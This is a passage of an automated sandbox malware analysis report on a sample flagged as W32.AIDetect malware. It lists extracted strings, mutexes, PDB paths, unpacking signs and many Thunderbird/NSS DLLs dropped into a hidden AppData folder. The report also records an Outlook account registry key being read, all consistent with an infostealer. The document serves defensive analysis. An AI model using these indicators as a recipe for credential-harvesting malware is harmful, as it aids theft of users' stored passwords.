Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, sqlite3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, sqlite3.dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, sqlite3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.1.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: sqlite3.dll.1.dr	Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.1.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, sqlite3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: sqlite3.dll.1.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Mutant created: \Sessions\1\BaseNamedObjects\user5L1M3_noturbusiness
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_01

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.1.dr
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.1.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.1.dr
Source:	Binary string: ucrtbase.pdb source: ucrtbase.dll.1.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323091495.0000000002DC9000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.1.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.1.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.1.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327457378.000000006E4F9000.00000002.00020000.sdmp, mozglue.dll.1.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.1.dr
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.1.dr
Source:	Binary string: PC:\boguxuram_wizuz\hakekuna.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.1.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy_InUse.dll.1.dr
Source:	Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.1.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.1.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.1.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327457378.000000006E4F9000.00000002.00020000.sdmp, mozglue.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.1.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.1.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.1.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.1.dr
Source:	Binary string: C:\boguxuram_wizuz\hakekuna.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.1.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.1.dr

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Unpacked PE file: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Unpacked PE file: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_004000BB push edx; retf		1_2_004000C2
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_004407F0 push ecx; ret		1_2_00440803

Source: sqlite3.dll.1.dr	Static PE information: section name: /4
Source: sqlite3.dll.1.dr	Static PE information: section name: /19
Source: sqlite3.dll.1.dr	Static PE information: section name: /31
Source: sqlite3.dll.1.dr	Static PE information: section name: /45
Source: sqlite3.dll.1.dr	Static PE information: section name: /57
Source: sqlite3.dll.1.dr	Static PE information: section name: /70
Source: sqlite3.dll.1.dr	Static PE information: section name: /81
Source: sqlite3.dll.1.dr	Static PE information: section name: /92
Source: AccessibleHandler.dll.1.dr	Static PE information: section name: .orpc
Source: AccessibleMarshal.dll.1.dr	Static PE information: section name: .orpc
Source: IA2Marshal.dll.1.dr	Static PE information: section name: .orpc
Source: lgpllibs.dll.1.dr	Static PE information: section name: .rodata
Source: MapiProxy.dll.1.dr	Static PE information: section name: .orpc
Source: MapiProxy_InUse.dll.1.dr	Static PE information: section name: .orpc
Source: mozglue.dll.1.dr	Static PE information: section name: .didat
Source: msvcp140.dll.1.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Code function: 1_2_0042A2F9 GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary,

1_2_0042A2F9

Source: ucrtbase.dll.1.dr

Static PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]

Source: initial sample

Static PE information: section name: .text entropy: 7.9745561755

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
